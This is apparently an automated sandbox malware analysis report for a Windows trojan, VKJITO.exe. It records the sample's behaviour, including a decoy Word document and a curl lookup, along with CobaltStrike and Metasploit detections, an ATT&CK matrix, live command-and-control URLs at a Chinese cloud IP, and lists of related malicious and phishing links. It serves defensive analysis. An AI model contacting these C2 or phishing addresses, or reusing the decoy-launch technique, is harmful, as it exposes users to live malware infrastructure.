        Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D435A9C0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7D435A9C0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4321880 SetLastError,GetCurrentDirectoryW,GetLastError,GetLastError,GetLastError,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlLookupFunctionEntry,WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,memset,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,ReleaseMutex,RtlVirtualUnwind,memset,WideCharToMultiByte,0_2_00007FF7D4321880
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D433E590 HeapAlloc,GetProcessHeap,HeapAlloc,0_2_00007FF7D433E590
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D435A9C0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7D435A9C0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D435AB64 SetUnhandledExceptionFilter,0_2_00007FF7D435AB64
        Source: C:\Users\user\Desktop\VKJITO.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\curl.exe "curl" ip.sbJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start C:\Users\user\Desktop\???????.docxJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o ""Jump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4342940 BCryptGenRandom,GetCurrentProcessId,BCryptGenRandom,CreateNamedPipeW,GetLastError,BCryptGenRandom,CloseHandle,BCryptGenRandom,0_2_00007FF7D4342940
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D435A89C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7D435A89C
        Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.9.drBinary or memory string: msmpeng.exe
        Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: Amcache.hve.9.drBinary or memory string: MsMpEng.exe

        Remote Access Functionality

        barindex
        Yara detected CobaltStrike
        Source: Yara matchFile source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Yara detected Metasploit Payload
        Source: Yara matchFile source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		1
        Browser Extensions        		12
        Process Injection        		2
        Masquerading        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		2
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Disable or Modify Tools        		LSASS Memory31
        Security Software Discovery        		Remote Desktop ProtocolData from Removable Media1
        Non-Standard Port        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Extra Window Memory Injection        		12
        Process Injection        		Security Account Manager1
        Process Discovery        		SMB/Windows Admin SharesData from Network Shared Drive1
        Ingress Tool Transfer        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Deobfuscate/Decode Files or Information        		NTDS1
        File and Directory Discovery        		Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
        Obfuscated Files or Information        		LSA Secrets3
        System Information Discovery        		SSHKeylogging112
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading        		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Extra Window Memory Injection        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577651 Sample: VKJITO.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 92 27 templatesmetadata.office.net 2->27 29 ip.sb 2->29 37 Found malware configuration 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 5 other signatures 2->43 8 VKJITO.exe 7 2->8         started        signatures3 process4 dnsIp5 31 139.159.139.109, 49707, 8080 HWCSNETHuaweiCloudServicedatacenterCN China 8->31 11 WerFault.exe 19 16 8->11         started        14 curl.exe 1 8->14         started        17 cmd.exe 4 2 8->17         started        process6 dnsIp7 25 C:\ProgramData\Microsoft\...\Report.wer, Unicode 11->25 dropped 33 ip.sb 104.26.12.31, 49706, 80 CLOUDFLARENETUS United States 14->33 35 127.0.0.1 unknown unknown 14->35 19 conhost.exe 14->19         started        21 WINWORD.EXE 190 462 17->21         started        23 conhost.exe 17->23         started        file8 process9

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        VKJITO.exe42%ReversingLabsWin64.Trojan.Iphellsgate

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://139.159.139.109/uz680%Avira URL Cloudsafe
        http://39.159.139.109:8080/uz680%Avira URL Cloudsafe
        http://139.159.139.109:8080/uz68cex0%Avira URL Cloudsafe
        http://139.159.139.109:8080/uz68fap0%Avira URL Cloudsafe
        http://139.159.139.109:8080/uz68g0%Avira URL Cloudsafe
        http://139.159.139.109:8080/uz680%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        ip.sb
        		104.26.12.31
        		truefalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://139.159.139.109/uz68true
          • Avira URL Cloud: safe
          		unknown
          http://39.159.139.109:8080/uz68true
          • Avira URL Cloud: safe
          		unknown
          http://139.159.139.109:8080/uz68true
          • Avira URL Cloud: safe
          		unknown
          http://ip.sb/false
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://upx.sf.netAmcache.hve.9.drfalse
              		high
              http://139.159.139.109:8080/uz68cexVKJITO.exe, 00000000.00000002.2451554357.000001A673AD6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://139.159.139.109:8080/uz68fapVKJITO.exe, 00000000.00000002.2451554357.000001A673AD6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://ip.sb/00005curl.exe, 00000001.00000002.2054270083.0000022B7B259000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://139.159.139.109:8080/uz68gVKJITO.exe, 00000000.00000002.2451554357.000001A673B0E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                139.159.139.109
                		unknownChina
                		55990HWCSNETHuaweiCloudServicedatacenterCNtrue
                104.26.12.31
                		ip.sbUnited States
                		13335CLOUDFLARENETUSfalse

                Private

                IP
                127.0.0.1

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1577651
                Start date and time:2024-12-18 16:22:23 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 45s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:18
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:VKJITO.exe
                Detection:MAL
                Classification:mal92.troj.winEXE@12/235@1/3
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 94%
                • Number of executed functions: 20
                • Number of non-executed functions: 90
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 52.109.89.19, 52.111.252.15, 52.111.252.18, 52.111.252.16, 52.111.252.17, 52.182.143.210, 2.17.100.200, 2.17.100.210, 2.19.198.179, 2.19.198.178, 2.19.198.112, 2.19.198.162, 2.19.198.171, 2.19.198.130, 2.19.198.145, 2.19.198.161, 20.42.73.29, 40.126.31.71, 20.12.23.50, 13.107.246.43, 23.218.208.109
                • Excluded domains from analysis (whitelisted): binaries.templates.cdn.office.net.edgesuite.net, slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, weu-azsc-000.roaming.officeapps.live.com, eur.roaming1.live.com.akadns.net, a1847.dscg2.akamai.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, ocsp.digicert.com, login.live.com, onedsblobprdeus15.eastus.cloudapp.azure.com, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, onedscolprdcus10.centralus.cloudapp.azure.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, prod-all.naturallanguageeditorservice.osi.office.net.akadns.net, otelrules.azureedge.net, prod-inc-resolver.naturallanguageeditorservice.osi.office.net.akadns.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguag
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtCreateFile calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • VT rate limit hit for: VKJITO.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                10:23:53API Interceptor1x Sleep call for process: WerFault.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                104.26.12.31http://www.fcc-movil.com/80th/enphem1sX2F0dG9ybmV5YXpAZmQub3JnGet hashmaliciousPhisherBrowse
                  https://www.popisoft.comGet hashmaliciousUnknownBrowse
                    Fd_HR24 Jul, 2024.pdfGet hashmaliciousPhisherBrowse
                      https://www.mynewsbreak.me/redirect-v2?originalUrl=aHR0cHM6Ly90cmFjay5oZWFsdGh5am9pbnRhaWQuY29tL2YwYmIzYjZlLWEyZjktNDBiYy1hZTNiLWQ0YmI5NzE0OTBlNT9jYW1wYWlnbmlkPTE3OTgzMTc0Mjk5OTAxMDUwODkmZmxpZ2h0aWQ9MTc5ODMxODI1NDM3OTExNDQ5NyZjcmVhdGl2ZWlkPTE3OTgzMjIxNzg0MjQ1NzgwNDkmdGlkPW5ld3NicmVha18xNzk4MzE3NDI5OTkwMTA1MDg5XzE3OTgzMTgyNTQzNzkxMTQ0OTdfMTc5ODMyMjE3ODQyNDU3ODA0OSZjbGlja2lkPW52c3NfMDkyODBlYmFmNTEwNDgyZmJkZGRkZjg4N2VhOWE0ZThfMTc5ODMyMjE3ODQyNDU3ODA0OSZpc19ub3ZhPXRydWUmbmJfY2lkPTA5MjgwZWJhZjUxMDQ4MmZiZGRkZGY4ODdlYTlhNGU4XzE3OTgzMjIxNzg0MjQ1NzgwNDk%3D&bucket=dmg_local_email_bucket_18&message_id=qk4YypJ-1SsY65wP&tag=subscribed&exps=nl_bucket_exp_24_2-v3%2Cnl_monetization_24_2-control%2Cnl_prerollout_24_2-v1%2Cnova_traffic_exp_full_09-v26&event_name=emailLinkClick&hashed_email=bb7f633dc30a2a97e85bd33fed777bd2a3f9c2541b52eb64ff345914e50393a5&email_domain=minotsbs.com&meta=eyJzdWJzX3RvcGljIjogImxvY2FsIiwgImZyZXEiOiAiZGFpbHkiLCAic2VuZF90cyI6IDE3MjA5NTkxNzcsICJsaW5rIjogIlNzS3hBQUJpIiwgInBvcyI6ICJsb2dvIiwgImFkX2lkIjogIjE3OTgzMjIxNzg0MjQ1NzgwNDkiLCAibm92YV9zbmFwc2hvdF9pZCI6ICIwOTI4MGViYWY1MTA0ODJmYmRkZGRmODg3ZWE5YTRlOF8xNzk4MzIyMTc4NDI0NTc4MDQ5In0%3DGet hashmaliciousUnknownBrowse
                        SecuriteInfo.com.Win64.Evo-gen.16085.20859.exeGet hashmaliciousAmadey, AsyncRAT, Djvu, Fabookie, LummaC Stealer, RHADAMANTHYS, RedLineBrowse
                          file.exeGet hashmaliciousGlupteba, RedLine, VidarBrowse
                            6eiKgvOR9U.exeGet hashmaliciousAmadey, Glupteba, Mystic Stealer, RedLine, SmokeLoaderBrowse
                              XmWWe6hWRl.exeGet hashmaliciousAmadey, Glupteba, Mystic Stealer, RedLine, SmokeLoaderBrowse
                                CBzb7Nk5HJ.exeGet hashmaliciousAmadey, Glupteba, Mystic Stealer, RedLine, SmokeLoaderBrowse
                                  qIHAPj4nzL.exeGet hashmaliciousAmadey, Glupteba, Mystic Stealer, RedLine, SmokeLoaderBrowse

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    CLOUDFLARENETUShttps://i.donotreply.biz/XWTZMVjBsbS9FS1Z2NzBoRzFZMy83RkoxVmlXaWlxaHo3VWFucmtuUGw1enh1ZWNEWVVSRmU5SURkU2psUnlGWUVLSzJtc3hJMVRZeXdZQTdKTVMwOTIySXc0dXRmSmkrKzVTSFFkRTlsZ0sycWdFdnhVY3BJNGx5ZnRmWTFhc0tuTTN1bVNUeUdFYkgrRW9rVllXdnIvNEE4aUgwNlR0R291UUxXUmY2L1JsVnZyNmMvbVpoUGJac04xckVKQlBXLS1PZFpzV3ByWmxpaEJybUhrLS1uMXVPRk5IWXlyNFBPNklpRkk0NTB3PT0=?cid=2330206445Get hashmaliciousKnowBe4Browse
                                    • 104.17.247.203
                                    0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 104.21.67.152
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                    • 104.21.12.88
                                    0Vwp4nJQOc.exeGet hashmaliciousLummaC, StealcBrowse
                                    • 172.67.179.109
                                    Lw1k8a7gQu.exeGet hashmaliciousLummaCBrowse
                                    • 104.21.64.80
                                    iOnDpwrkWY.exeGet hashmaliciousLummaCBrowse
                                    • 172.67.197.170
                                    Z1jUFmrTua.exeGet hashmaliciousLummaC, StealcBrowse
                                    • 172.67.179.109
                                    random.exe.7.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                    • 104.21.12.88
                                    ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                    • 104.21.66.86
                                    https://heyzine.com/flip-book/f976862c0c.htmlGet hashmaliciousUnknownBrowse
                                    • 172.67.73.205
                                    HWCSNETHuaweiCloudServicedatacenterCNjew.mips.elfGet hashmaliciousUnknownBrowse
                                    • 124.70.20.249
                                    arm7.elfGet hashmaliciousUnknownBrowse
                                    • 121.37.152.93
                                    IGz.mips.elfGet hashmaliciousMiraiBrowse
                                    • 121.37.118.203
                                    TRC.spc.elfGet hashmaliciousMiraiBrowse
                                    • 121.36.194.254
                                    SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                    • 124.71.162.21
                                    x86_64.elfGet hashmaliciousMiraiBrowse
                                    • 139.9.27.90
                                    rebirth.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 124.71.180.2
                                    la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                    • 124.71.98.237
                                    jew.ppc.elfGet hashmaliciousUnknownBrowse
                                    • 121.37.118.213
                                    powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 121.38.236.200

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):118
                                    Entropy (8bit):3.5700810731231707
                                    Encrypted:false
                                    SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                    MD5:573220372DA4ED487441611079B623CD
                                    SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                    SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                    SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_VKJITO.exe_f6b17de85a2171e22cf1f59fe60dc5193e36c79_bbfc0d35_9270bf73-a690-4f5a-a24a-8b38e9751b91\Report.wer

                                    Download File
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.8991266529241227
                                    Encrypted:false
                                    SSDEEP:96:EwFVvJmi8yswAioh7JfYQXIDcQWc6zcEZcw37X+HbHg/KownOg3FxTYbATFwdJTb:R3x78yA0I3D0jovNzuiFlZ24lO8X
                                    MD5:9ABB2544B6F65B4C85291F3625B888F9
                                    SHA1:B96EEF156E3042EBDEE3D9E776053A2F19B5D4FE
                                    SHA-256:F8FA68A13EA933C4B783F092D2E5EE287C1A6051F434FB3B49FCD74F1FB155AA
                                    SHA-512:8D46B92F3C10A895CFE43181C2F310448ABA19A393E91985F947A14E85530A744B3FA2DC7C00C4CAB31DA32F36BDC8F79F2EE8D4B6B1B52EFB5138E7F4B43777
                                    Malicious:true
                                    Reputation:low
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.0.8.9.9.8.5.7.1.9.7.5.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.0.8.9.9.9.6.0.3.2.2.2.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.2.7.0.b.f.7.3.-.a.6.9.0.-.4.f.5.a.-.a.2.4.a.-.8.b.3.8.e.9.7.5.1.b.9.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.1.0.7.f.8.d.9.-.1.b.5.3.-.4.9.b.3.-.b.8.e.0.-.d.a.3.b.3.2.4.4.8.5.e.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.V.K.J.I.T.O...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.f.0.-.0.0.0.1.-.0.0.1.4.-.6.2.d.0.-.6.1.c.0.6.0.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.2.0.8.1.7.2.3.0.4.2.3.4.b.c.4.2.2.a.7.d.f.4.5.b.9.1.3.f.a.9.e.0.0.0.0.0.0.0.0.!.0.0.0.0.a.e.4.3.a.1.0.d.4.6.2.f.0.9.a.a.7.b.9.4.5.b.5.b.3.7.a.a.d.9.c.0.d.1.d.f.4.b.0.1.!.V.K.J.I.T.O...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2././.1.7.:.0.4.:.5.2.:.0.

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE76.tmp.dmp

                                    Download File
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 15:23:19 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):155650
                                    Entropy (8bit):1.3130107134741882
                                    Encrypted:false
                                    SSDEEP:384:EH8LjvVKdNtHhKQG3Qls2lBb9h24YjAFFuKL7zvZ7/Nx76TXHVAB0:u8LbVKdLNXvZ7L76zH9
                                    MD5:1AA5C0BDCCC586BB76DF04CBC3536515
                                    SHA1:B3CF2CC51BA7BC0AF0DA29A769211FAE5A1623FF
                                    SHA-256:2417B8DECEA81D2DF312E904FDE715310E65789D3966A551B27DCC70C8D441F7
                                    SHA-512:A7AF2B17EF7B7313F17326F4F58DF3DC6BF27CD59A54CE77FF6A9DE80DD12529AFA2E8F38D65108D3F443BA6CE190935B3393681863D38E96B9139190320A33D
                                    Malicious:false
                                    Yara Hits:
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE76.tmp.dmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE76.tmp.dmp, Author: unknown
                                    Preview:MDMP..a..... .........bg............................(.......$....\..........`.......8...........T...........8-...2..................................h...............................................................................eJ......x.......Lw......................T.............bg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC165.tmp.WERInternalMetadata.xml

                                    Download File
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8758
                                    Entropy (8bit):3.710024426708561
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJMf+U6YEIZLjhLngmfIUpD789bZg1fUSTm:R6lXJ896YEajhLngmfIlZqfUv
                                    MD5:4C5D840114F9A187680196C811155260
                                    SHA1:E759A77E819091A87CED2260ABC5BCA6B852F399
                                    SHA-256:528AE462C79CBA46DC5B9068037F6FB3C4AB503FEEC0ECB59050A7872276F448
                                    SHA-512:7A787FB29229AB79E57338687F89B938E940855AE90BF999FA581D0716A7BDA3B5B74871B9E5C33F6794AA451635D9CEF8C380BB932C5DB733099F7C2D8D111E
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.0.5.6.<./.P.i.

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC1C4.tmp.xml

                                    Download File
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4661
                                    Entropy (8bit):4.495845837979619
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsrJg771I9f9zuWpW8VY+Ym8M4J+doOKFndRvyq859AZOD5CTz3Ed:uIjfFI7G9zP7VKJD5Rv/c+z3Ed
                                    MD5:BE6C1B199E4EF7E21FE9680D73C18AE0
                                    SHA1:4754AE8528DF187652B01C789E632563C6B8C2AC
                                    SHA-256:ABC70D1402DEE03A833C7ABEFD77B1999D1C6687EC2338C063F8DA756550D3B2
                                    SHA-512:B53F39A591AA9D3B49950E60A480BD941DCAE0A6C5AD5E4AA6543FF525B5178A13A2E35F5CF541AB278F8928D7AC6F2A25C61B144B0DF9C57DCEF0582FBF3852
                                    Malicious:false
